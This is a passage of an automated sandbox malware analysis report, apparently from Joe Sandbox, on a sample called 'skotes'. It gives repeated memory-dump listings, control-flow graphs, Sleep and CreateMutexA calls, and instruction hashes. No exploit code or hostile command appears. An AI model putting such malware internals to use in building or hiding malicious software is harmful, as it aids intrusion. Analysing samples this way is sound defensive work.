                                                                                                                                                                • Associated: 00000003.00000002.2213081792.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213099332.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213119970.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213142325.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213164561.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213193073.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213214678.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213249882.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213269198.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213297921.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213322573.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213347437.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213369914.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213394298.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213420667.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213443978.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213467870.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213496984.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213519853.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213542967.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213565181.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213588695.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213620092.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213649557.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213678014.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213705079.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213741370.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213758244.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213778827.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213778827.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213842451.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213870900.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213897006.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213920919.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213946530.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213977085.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2214002671.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2214026456.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                • Opcode ID: ad6ddaf07ec608a1c499d54205bff906a39690abff7572fe78d5bf781ef63a40
                                                                                                                                                                • Instruction ID: e08ae85185276f904ae5474a798190118b17b5240c3d31930589d522e862b850
                                                                                                                                                                • Opcode Fuzzy Hash: ad6ddaf07ec608a1c499d54205bff906a39690abff7572fe78d5bf781ef63a40
                                                                                                                                                                • Instruction Fuzzy Hash: 1F314A316041049BFB08FBB8CCC9BADB7E2DB86314F2446DAE054A73E1C775A980C752

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 90 b8a1ae-b8a1ce 94 b8a1fc-b8a218 90->94 95 b8a1d0-b8a1dc 90->95 96 b8a21a-b8a226 94->96 97 b8a246-b8a265 94->97 98 b8a1de-b8a1ec 95->98 99 b8a1f2-b8a1f9 call b9d663 95->99 100 b8a228-b8a236 96->100 101 b8a23c-b8a243 call b9d663 96->101 102 b8a293-b8a916 call b980c0 97->102 103 b8a267-b8a273 97->103 98->99 104 b8a935 98->104 99->94 100->101 100->104 101->97 107 b8a289-b8a290 call b9d663 103->107 108 b8a275-b8a283 103->108 110 b8a953-b8a994 Sleep CreateMutexA 104->110 111 b8a935 call bb6c6a 104->111 107->102 108->104 108->107 119 b8a996-b8a998 110->119 120 b8a9a7-b8a9a8 110->120 111->110 119->120 122 b8a99a-b8a9a5 119->122 122->120
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 00B8A963
                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00BE3254), ref: 00B8A981
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.2212616596.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.2212595295.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212616596.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212698575.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212722785.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212748647.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212881177.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212911404.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213010680.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213010680.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213058348.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213081792.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213099332.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213119970.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213142325.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213164561.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213193073.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213214678.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213249882.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213269198.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213297921.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213322573.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213347437.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213369914.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213394298.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213420667.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213443978.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213467870.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213496984.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213519853.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213542967.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213565181.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213588695.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213620092.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213649557.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213678014.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213705079.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213741370.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213758244.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213778827.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213778827.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213842451.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213870900.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213897006.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213920919.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213946530.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213977085.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2214002671.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2214026456.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                • Opcode ID: 1b436603dd7160af11bbd0c66cd5cddc25ec2eda54cc37e708eb805b1b4a9440
                                                                                                                                                                • Instruction ID: fd3cbdfcf7308cb68a7f4e7c87afe8bf00679948b52295fe51ed35e5fcfe3b32
                                                                                                                                                                • Opcode Fuzzy Hash: 1b436603dd7160af11bbd0c66cd5cddc25ec2eda54cc37e708eb805b1b4a9440
                                                                                                                                                                • Instruction Fuzzy Hash: C5312A31A041449BFB18FB78DCC9BADB7E2EBC6310F24469AE054A72E1D7759980C752

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 124 b8a418-b8a438 128 b8a43a-b8a446 124->128 129 b8a466-b8a482 124->129 132 b8a448-b8a456 128->132 133 b8a45c-b8a463 call b9d663 128->133 130 b8a4b0-b8a4cf 129->130 131 b8a484-b8a490 129->131 136 b8a4fd-b8a916 call b980c0 130->136 137 b8a4d1-b8a4dd 130->137 134 b8a492-b8a4a0 131->134 135 b8a4a6-b8a4ad call b9d663 131->135 132->133 138 b8a93f-b8a994 call bb6c6a * 4 Sleep CreateMutexA 132->138 133->129 134->135 134->138 135->130 142 b8a4df-b8a4ed 137->142 143 b8a4f3-b8a4fa call b9d663 137->143 160 b8a996-b8a998 138->160 161 b8a9a7-b8a9a8 138->161 142->138 142->143 143->136 160->161 162 b8a99a-b8a9a5 160->162 162->161
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 00B8A963
                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00BE3254), ref: 00B8A981
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.2212616596.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.2212595295.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212616596.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212698575.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212722785.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212748647.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212881177.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212911404.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213010680.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213010680.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213058348.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213081792.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213099332.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213119970.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213142325.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213164561.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213193073.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213214678.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213249882.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213269198.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213297921.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213322573.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213347437.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213369914.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213394298.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213420667.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213443978.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213467870.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213496984.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213519853.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213542967.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213565181.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213588695.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213620092.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213649557.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213678014.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213705079.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213741370.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213758244.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213778827.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213778827.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213842451.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213870900.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213897006.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213920919.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213946530.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213977085.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2214002671.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2214026456.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                • Opcode ID: 3571d88b569b1d15cfa4b3cd412a7d06b0890d4c1b1b26fd19d062a52080ca05
                                                                                                                                                                • Instruction ID: 2bfcabf2752efcb7af264a26347760187f7708fd85aeca4590e6ba300f76fca8
                                                                                                                                                                • Opcode Fuzzy Hash: 3571d88b569b1d15cfa4b3cd412a7d06b0890d4c1b1b26fd19d062a52080ca05
                                                                                                                                                                • Instruction Fuzzy Hash: BF313B316041009BFF08BB78D8C9BBDBBE2DB85314F24469AE054973E5D7B59980C752

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 164 b8a54d-b8a56d 168 b8a59b-b8a5b7 164->168 169 b8a56f-b8a57b 164->169 172 b8a5b9-b8a5c5 168->172 173 b8a5e5-b8a604 168->173 170 b8a57d-b8a58b 169->170 171 b8a591-b8a598 call b9d663 169->171 170->171 174 b8a944-b8a994 call bb6c6a * 3 Sleep CreateMutexA 170->174 171->168 176 b8a5db-b8a5e2 call b9d663 172->176 177 b8a5c7-b8a5d5 172->177 178 b8a632-b8a916 call b980c0 173->178 179 b8a606-b8a612 173->179 198 b8a996-b8a998 174->198 199 b8a9a7-b8a9a8 174->199 176->173 177->174 177->176 184 b8a628-b8a62f call b9d663 179->184 185 b8a614-b8a622 179->185 184->178 185->174 185->184 198->199 200 b8a99a-b8a9a5 198->200 200->199
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 00B8A963
                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00BE3254), ref: 00B8A981
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.2212616596.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.2212595295.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212616596.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212698575.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212722785.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212748647.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212881177.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212911404.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213010680.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213010680.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213058348.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213081792.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213099332.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213119970.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213142325.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213164561.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213193073.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213214678.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213249882.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213269198.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213297921.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213322573.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213347437.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213369914.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213394298.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213420667.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213443978.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213467870.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213496984.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213519853.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213542967.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213565181.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213588695.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213620092.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213649557.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213678014.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213705079.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213741370.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213758244.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213778827.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213778827.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213842451.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213870900.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213897006.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213920919.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213946530.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213977085.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2214002671.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2214026456.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                • Opcode ID: 9bfdc29a3e983c518855a5fbde5c03a464b3a38ba7a438624ba96a393ac80eb1
                                                                                                                                                                • Instruction ID: 0cea4c695777afba67a4cfd3c8db24c0d32ff09301953abb58cbdcf404d3e6a3
